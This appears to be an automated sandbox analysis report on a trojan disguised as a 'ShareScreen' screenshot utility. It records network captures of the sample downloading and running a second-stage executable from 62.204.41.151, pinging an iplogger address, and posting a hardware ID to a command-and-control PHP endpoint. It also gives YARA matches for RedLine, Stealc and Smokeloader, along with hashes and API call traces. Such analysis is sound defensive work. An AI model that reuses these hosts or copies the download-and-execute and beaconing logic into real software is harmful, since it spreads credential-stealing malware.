0	192.168.2.7	49700	62.204.41.151	80	5352	C:\Users\user\Desktop\4h1Zc12ZBe.exe

Timestamp	Bytes transferred	Direction	Data
Aug 22, 2024 09:24:00.784992933 CEST	84	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 62.204.41.151
Aug 22, 2024 09:24:01.488389015 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 22 Aug 2024 07:24:01 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 22 Aug 2024 07:20:02 GMT ETag: "59c00-620407cb4c50c" Accept-Ranges: bytes Content-Length: 367616 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea b8 25 1d ae d9 4b 4e ae d9 4b 4e ae d9 4b 4e c1 af d5 4e bc d9 4b 4e c1 af e1 4e f0 d9 4b 4e c1 af e0 4e 8f d9 4b 4e a7 a1 d8 4e a7 d9 4b 4e ae d9 4a 4e d0 d9 4b 4e c1 af e4 4e af d9 4b 4e c1 af d1 4e af d9 4b 4e c1 af d6 4e af d9 4b 4e 52 69 63 68 ae d9 4b 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 36 3b 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 a2 03 00 00 2a 1b 00 00 00 00 00 13 49 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 c9 b2 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%KNKNKNNKNNKNNKNNKNJNKNNKNNKNNKNRichKNPEL6;e*I@0$dP~2@.textv `.datav@.rsrcP@@
Aug 22, 2024 09:24:01.488415956 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 03 00 d6 a8 03 00 e8 a8 03 00 f8 a8 03 00 10 a9 03 00 24 a9 03 00 42 a9 03 00 4e a9 03 00 66 a9 03 00 7e a9 03 00 9c a9 Data Ascii: $BNf~.>Rbx .B\l 2FfxX
Aug 22, 2024 09:24:01.488426924 CEST	1236	IN	Data Raw: 61 00 74 00 69 00 76 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 72 00 75 00 63 00 74 00 6f 00 72 00 20 00 6f 00 72 00 20 00 66 00 72 00 6f 00 6d 00 20 00 44 00 6c 00 6c 00 4d 00 61 00 69 00 6e 00 2e 00 0d 00 0a 00 00 00 00 00 52 00 36 00 30 00 Data Ascii: ative constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to initialize t
Aug 22, 2024 09:24:01.488437891 CEST	1236	IN	Data Raw: 73 00 70 00 61 00 63 00 65 00 20 00 66 00 6f 00 72 00 20 00 74 00 68 00 72 00 65 00 61 00 64 00 20 00 64 00 61 00 74 00 61 00 0d 00 0a 00 00 00 52 00 36 00 30 00 31 00 30 00 0d 00 0a 00 2d 00 20 00 61 00 62 00 6f 00 72 00 74 00 28 00 29 00 20 00 Data Ascii: space for thread dataR6010- abort() has been calledR6009- not enough space for environmentR6008- not enoug
Aug 22, 2024 09:24:01.488449097 CEST	1236	IN	Data Raw: 4a 00 61 00 6e 00 00 00 53 00 61 00 74 00 75 00 72 00 64 00 61 00 79 00 00 00 00 00 46 00 72 00 69 00 64 00 61 00 79 00 00 00 00 00 54 00 68 00 75 00 72 00 73 00 64 00 61 00 79 00 00 00 00 00 57 00 65 00 64 00 6e 00 65 00 73 00 64 00 61 00 79 00 Data Ascii: JanSaturdayFridayThursdayWednesdayTuesdayMondaySundaySatFriThuWedTueMonSunHH:mm:ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDec
Aug 22, 2024 09:24:01.488466024 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ((((( H
Aug 22, 2024 09:24:01.488476992 CEST	1236	IN	Data Raw: 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Aug 22, 2024 09:24:01.488501072 CEST	1236	IN	Data Raw: 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 5b 5d 20 63 6c 6f 73 75 72 65 27 00 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 20 63 6c 6f 73 75 72 65 27 00 00 60 6f Data Ascii: tructor iterator'`placement delete[] closure'`placement delete closure'`omni callsig' delete[] new[]`local vftable constructor closure'`local vftable'`RTTI`EH`udt returning'`copy constructor closure'`eh vector vbase co
Aug 22, 2024 09:24:01.488517046 CEST	1236	IN	Data Raw: 84 2d 40 00 80 2d 40 00 78 2d 40 00 68 2d 40 00 44 2d 40 00 3c 2d 40 00 30 2d 40 00 20 2d 40 00 04 2d 40 00 e4 2c 40 00 bc 2c 40 00 94 2c 40 00 6c 2c 40 00 40 2c 40 00 24 2c 40 00 00 2c 40 00 dc 2b 40 00 b0 2b 40 00 84 2b 40 00 68 2b 40 00 0a 21 Data Ascii: -@-@x-@h-@D-@<-@0-@ -@-@,@,@,@l,@@,@$,@,@+@+@+@h+@!@T+@8+@$+@+@*@CONOUT$kernel32.dllkernel32.dllzoxmsimg32.dllyeyibavayucudabeyecodugebi00H
Aug 22, 2024 09:24:01.488529921 CEST	1236	IN	Data Raw: 24 14 89 74 24 34 8b 44 24 34 29 44 24 18 8b 44 24 30 29 44 24 10 ff 4c 24 24 0f 85 d8 fe ff ff 8b 44 24 20 8b 4c 24 18 89 08 89 78 04 83 c0 08 ff 4c 24 28 89 44 24 20 0f 85 ea fd ff ff 5f 5e 5d 5b 8b e5 5d c3 cc cc 55 8b ec 64 a1 00 00 00 00 6a Data Ascii: $t$4D$4)D$D$0)D$L$$D$ L$xL$(D$ _^][]UdjhCPd%(S@VW=l@3jBq F}\|="^3VVVVV@VV@V@VPV@VVQVV@VVV@3*VVV@
Aug 22, 2024 09:24:01.493386030 CEST	1236	IN	Data Raw: 10 00 00 00 00 66 89 0e c3 e9 42 10 00 00 cc cc cc cc cc cc 55 8b ec 57 56 8b 75 0c 8b 4d 10 8b 7d 08 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 a0 01 00 00 81 f9 80 00 00 00 72 1c 83 3d 9c 41 5e 00 00 74 13 57 56 83 e7 0f 83 e6 0f 3b fe 5e 5f 75 Data Ascii: fBUWVuM};v;r=A^tWV;^_ugur)$<@r$;@$<@$d<@;@ <@D<@#FGFGr$<@I#FGr$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49713	62.204.41.151	80	6480	C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Aug 22, 2024 09:24:18.108359098 CEST	88	OUT	GET / HTTP/1.1 Host: 62.204.41.151 Connection: Keep-Alive Cache-Control: no-cache
Aug 22, 2024 09:24:18.787571907 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 22 Aug 2024 07:24:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 22, 2024 09:24:18.793215990 CEST	414	OUT	POST /edd20096ecef326d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH Host: 62.204.41.151 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 41 30 46 31 39 46 32 39 38 34 31 33 34 30 30 39 33 31 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="hwid"6FA0F19F29841340093196------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build"default------GCBGIIECGHCAKECAFBFH--
Aug 22, 2024 09:24:19.080096960 CEST	210	IN	HTTP/1.1 200 OK Date: Thu, 22 Aug 2024 07:24:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	172.67.167.249	443	5352	C:\Users\user\Desktop\4h1Zc12ZBe.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-22 07:23:59 UTC	68	OUT	GET /1vM485 HTTP/1.1 User-Agent: ShareScreen Host: iplogger.co
2024-08-22 07:24:00 UTC	1141	IN	HTTP/1.1 200 OK Date: Thu, 22 Aug 2024 07:24:00 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close set-cookie: 55119695137263905=3; expires=Fri, 22 Aug 2025 07:24:00 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=8.46.123.33; expires=Fri, 22 Aug 2025 07:24:00 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.42942047119140625 expires: Thu, 22 Aug 2024 07:24:00 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PpnNvOpjsAm%2B89EeJSVQsxlKlcILN8DRI6zpmxcs8rMC4LMzyCEkBrA27ndSJH3BpUPqUbCIC8%2FVm9AgNv6FApiteoUzK4V9TH3ms4KNLRX4%2FQZwbx5MJsC2yhydlA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b711ee40db443a4-EWR alt-svc: h3=":443"; ma=86400
2024-08-22 07:24:00 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-08-22 07:24:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:23:57
Start date:	22/08/2024
Path:	C:\Users\user\Desktop\4h1Zc12ZBe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4h1Zc12ZBe.exe"
Imagebase:	0x400000
File size:	371'712 bytes
MD5 hash:	2A862D97CC67DA2511680862033B5228
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	03:24:00
Start date:	22/08/2024
Path:	C:\Users\user\AppData\Local\Temp\169F.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\169F.tmp.exe"
Imagebase:	0x400000
File size:	367'616 bytes
MD5 hash:	D1B7450967D42B98290D97DD1A8CFA6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1459945134.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:24:17
Start date:	22/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1068
Imagebase:	0xab0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5%
Total number of Nodes:	739
Total number of Limit Nodes:	25

Executed Functions

Function 00401132 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 169
registrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32(00000000,00000000,screenshoter), ref: 0040115B
GetLastError.KERNEL32 ref: 00401161
ExitProcess.KERNEL32 ref: 0040116F
RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040120D
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004), ref: 00401230
RegCloseKey.ADVAPI32(?), ref: 00401240
RegisterClassExW.USER32(?), ref: 00401280
CreateWindowExW.USER32(00000000,Main,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00401292

Strings

screenshoter, xrefs: 00401154
Enabled, xrefs: 004011BC
Main, xrefs: 0040126E, 00401290
SOFTWARE\prtscreen, xrefs: 00401198

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Create$ClassCloseErrorExitLastMutexProcessRegisterValueWindow
String ID: Enabled$Main$SOFTWARE\prtscreen$screenshoter
API String ID: 3653679707-1625791362
Opcode ID: 3893e645dbe86b0ae2fa87b3a64678826491d4292ef999e93e2861638aedebed
Instruction ID: 4a13b59ce61f23f6dbfcf7498d286a3c53fb67ce10ec46bee0b772ccb5a5c466
Opcode Fuzzy Hash: 3893e645dbe86b0ae2fa87b3a64678826491d4292ef999e93e2861638aedebed
Instruction Fuzzy Hash: 685142B2504344AFD320EF61DC89EAF7BECEB84754F40093EFA55A2191D7749904CBAA

Function 00401F05 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 133
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00401F26
InternetOpenUrlW.WININET(00000000,http://62.204.41.151/ScreenUpdateSync.exe,00000000,00000000,00000000,00000000), ref: 00401F40
GetTempPathW.KERNEL32(00000105,?), ref: 00401F5C
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00401F72
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401FAB
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00401FE7
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402004
CloseHandle.KERNEL32(00000000), ref: 0040201A
ShellExecuteExW.SHELL32(?), ref: 0040207B
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402090
CloseHandle.KERNEL32(?), ref: 0040209C
InternetCloseHandle.WININET(00000000), ref: 004020A5
InternetCloseHandle.WININET(00000000), ref: 004020A8

Strings

<, xrefs: 00402058
.exe, xrefs: 00401F7E
http://62.204.41.151/ScreenUpdateSync.exe, xrefs: 00401F3A
ShareScreen, xrefs: 00401F21

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen$http://62.204.41.151/ScreenUpdateSync.exe
API String ID: 3323492106-1798614884
Opcode ID: fc19bd224733e7606a953d81e75e3f2164e68c5adb46d74b355d75197e3c4b42
Instruction ID: d60032ada2afacbab834c400a267761fe859b51b606ca5b2ec3c1fec5624aee1
Opcode Fuzzy Hash: fc19bd224733e7606a953d81e75e3f2164e68c5adb46d74b355d75197e3c4b42
Instruction Fuzzy Hash: BD41457190021DAEE721DB61DD89FEB77BCFF04344F0080BAA645A2190DB749E858FA4

Function 00401938 Relevance: 52.7, APIs: 25, Strings: 5, Instructions: 232
windowkeyboardfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00401959
PostQuitMessage.USER32(00000000), ref: 00401999
DestroyWindow.USER32(?), ref: 00401A0C
DefWindowProcW.USER32(?,00000204,?,?), ref: 00401A1E
ReleaseCapture.USER32 ref: 00401A31
CreateCompatibleBitmap.GDI32(?,-00454457,00000001), ref: 00401AD2
CreateCompatibleDC.GDI32(?), ref: 00401AE0
SelectObject.GDI32(00000000,?), ref: 00401AEF
BitBlt.GDI32(?,00000000,00000000,?,00000001,?,00CC0020), ref: 00401B15
ShowWindow.USER32(?,00000000), ref: 00401B1D
GetTempPathW.KERNEL32(00000104,?), ref: 00401B30
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00401B49
MessageBoxW.USER32(?,Cannot save png image,ShareScreen,00000010), ref: 00401B7E
DeleteFileW.KERNEL32(?), ref: 00401B89
DeleteDC.GDI32(?), ref: 00401B93
DeleteObject.GDI32(?), ref: 00401B9A
ReleaseDC.USER32(00000000,?), ref: 00401BA5
DestroyWindow.USER32(?), ref: 00401BAC
SetCapture.USER32(?), ref: 00401BF6
GetDC.USER32(00000000), ref: 00401C2A
GetDC.USER32(00000000), ref: 00401A58

Part of subcall function 00401534: ShowWindow.USER32(00000005), ref: 00401549
Part of subcall function 00401534: UpdateWindow.USER32 ref: 00401551
Part of subcall function 00401534: ShowWindow.USER32(00000000), ref: 00401565
Part of subcall function 00401534: MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 004015C8

ReleaseDC.USER32(00000000,00000000), ref: 00401C40
GetKeyState.USER32(0000001B), ref: 00401C4D
DestroyWindow.USER32(?), ref: 00401C62

Strings

XDE, xrefs: 00401A60
Cannot save png image, xrefs: 00401B78
gya, xrefs: 00401B3C
XDE, xrefs: 00401C31
ShareScreen, xrefs: 00401B73

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Window$DeleteDestroyReleaseShow$CaptureCompatibleCreateFileMessageObjectProcTemp$BitmapMoveNamePathPostQuitSelectStateUpdate
String ID: Cannot save png image$ShareScreen$XDE$XDE$gya
API String ID: 3423224022-76392978
Opcode ID: 96bf3f5d63118334a9e745a4f5a084f6e7cb07da5fff3b72f1c75600e50bd9a0
Instruction ID: 1697b42e1f8de118586dc278ca5df409c3c23546c4aab90d227758e6a6066b8a
Opcode Fuzzy Hash: 96bf3f5d63118334a9e745a4f5a084f6e7cb07da5fff3b72f1c75600e50bd9a0
Instruction Fuzzy Hash: 5F818B71100305ABDB149F64EC49BAB7BB4FB89309F00413AFA52A62B2D738D951DF6D

Function 0042AF30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&B, xrefs: 0042B225, 0042B1BB, 0042B1DD

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID: &B
API String ID: 0-3208460036
Opcode ID: 8a71fe3748db11d1b78b4add665432b7eaf8bc20a2145e4578248e036654a6a4
Instruction ID: ae103d100e146c9fad21e87f0cc405b2060397e42ce2b38946f21e59fb06158f
Opcode Fuzzy Hash: 8a71fe3748db11d1b78b4add665432b7eaf8bc20a2145e4578248e036654a6a4
Instruction Fuzzy Hash: 86C1D470F043699FCB11DFA9E845BAE7BB0EF0A301F54409AE514A7392C7789941CBA9

Function 00435558 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00435226: CreateFileW.KERNEL32(00000000,00000000,?,00435601,?,?,00000000,?,00435601,00000000,0000000C), ref: 00435243

GetLastError.KERNEL32 ref: 0043566C
__dosmaperr.LIBCMT ref: 00435673
GetFileType.KERNEL32(00000000), ref: 0043567F
GetLastError.KERNEL32 ref: 00435689
__dosmaperr.LIBCMT ref: 00435692
CloseHandle.KERNEL32(00000000), ref: 004356B2
CloseHandle.KERNEL32(?), ref: 004357FC
GetLastError.KERNEL32 ref: 0043582E
__dosmaperr.LIBCMT ref: 00435835

Strings

H, xrefs: 004357BA

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 4b4d84bd30324a62295f6d0c28ba86746d1fb51b9c69dc728d4d6862b730fef8
Instruction ID: e3969a3000ddf49273f6e5ac1fd687a184e7fc7a7908401306ee03db5be944b3
Opcode Fuzzy Hash: 4b4d84bd30324a62295f6d0c28ba86746d1fb51b9c69dc728d4d6862b730fef8
Instruction Fuzzy Hash: 1EA16732A105548FCF189F68D8427AE3BB0EB0A324F14115FE815EB3D1DB389D12CB99

Function 00402580 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 0040258D
InternetOpenUrlW.WININET(00000000,https://iplogger.co/1vM485,00000000,00000000,00000000,00000000), ref: 004025A3
InternetCloseHandle.WININET(00000000), ref: 004025B4
InternetCloseHandle.WININET(00000000), ref: 004025B7

Strings

ShareScreen, xrefs: 00402588
https://iplogger.co/1vM485, xrefs: 0040259D

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Internet$CloseHandleOpen
String ID: ShareScreen$https://iplogger.co/1vM485
API String ID: 435140893-1336695904
Opcode ID: 1c1ab425606ad6340bd38ec3a40c4539b706801de2a7ea9815b447f03f0f1d19
Instruction ID: c82107eca0256acf2c26425c2e757790c138e57c376dab0ddf1486e9589acfd7
Opcode Fuzzy Hash: 1c1ab425606ad6340bd38ec3a40c4539b706801de2a7ea9815b447f03f0f1d19
Instruction Fuzzy Hash: 3BE04F2260213576473116772D1DEEB1D5CDE83AF1315017AB91DE22D0DA688801D6F8

Function 0040494D Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

